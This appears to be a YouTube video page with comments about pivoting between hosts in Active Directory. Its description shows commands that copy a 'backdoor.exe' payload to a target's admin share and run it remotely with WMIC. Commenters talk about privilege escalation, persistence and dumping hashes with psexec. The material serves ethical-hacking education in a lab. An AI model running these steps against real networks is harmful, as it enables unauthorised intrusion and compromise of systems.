How to Pivot (Lateral Movement) in Active Directory Using WMIC
HTML-код
- Опубликовано: 1 авг 2024
- Learn how to pivot hosts using WMIC.
Command to copy executable to target:
copy payload \\target\
(example: copy backdoor.exe \\192.168.1.100\c$)
============================================
Command to execute payload on target:
wmic /node:"target" process call create "\\target\payload\"
(example : wmic /node:"192.168.1.100" process call create "\\192.168.1.100\c$\backdoor.exe")
(example: copy backdoor.exe 192.168.1.100)
Link to FREE windows 10, Windows server images for practice:
www.microsoft.com/en-us/evalc...
Link for Kali Linux:
www.kali.org/get-kali/
DISCLAIMER
All material provided on this video and this channel is intended for informational/educational purposes only and should not be performed
unless you have permission to do so. These videos are to be performed
within a virtual lab for ethical hacking education only. I am not responsible for any misuse, damages, and or loss of data due to misuse of this information.
there is a very limited amount of content creators out there. which makes what you do even more important. thank you for all that you do.
Nice work. very informative
Wow , this was amazing!! i have been struggling with povoting and have gone through a lot of resources just to end up even more confused😅... but your video made things straight and this technique is going to be part of my arsenal for a very long time , thank you for the work that you do it is quite inspiring ❤️
Thank you for the kind words!
Amazing!!! What don't you make a Udemy course and get more benefit!
Setup.exe is on your desktop and you copy the file from the shell? How did you do that?
The Setup.exe is already at : C:\Users\John.doe thats why he could easy copy from the Windows-Client to the DC. Most ITs have that locked that Files are open to read so thats why some fileshare which everyone can read/write/execute are really importen to find a vurability.
When I using the wmic /node:"Windows Server IP" process call create "\\Windows Server IP\c$\backdoor.exe", it's get ""Access is denied"
I believe you have to be a domain admin. Typically when making adjustments to any host machine on a domain you’ll need to be a domain admin, this is where privilege escalation comes in. Once you obtain admin status, you can then setup persistence and easily pivot.
@@officialexploitacademy thanks for you advice
@@officialexploitacademy okay granting local admin perms on a windows host isn't kinda hard, there are a few exploits, mostly in unpatched windows versions. Much more easier with physical access. But even if you get local admin perms you are not domain admin.
@@jannik2898 Thats why, when you hacked a computer you try to get as many information as possible and also abuse psexe to get the permission to read the hashes. Then you can start doing the damage you wanna do.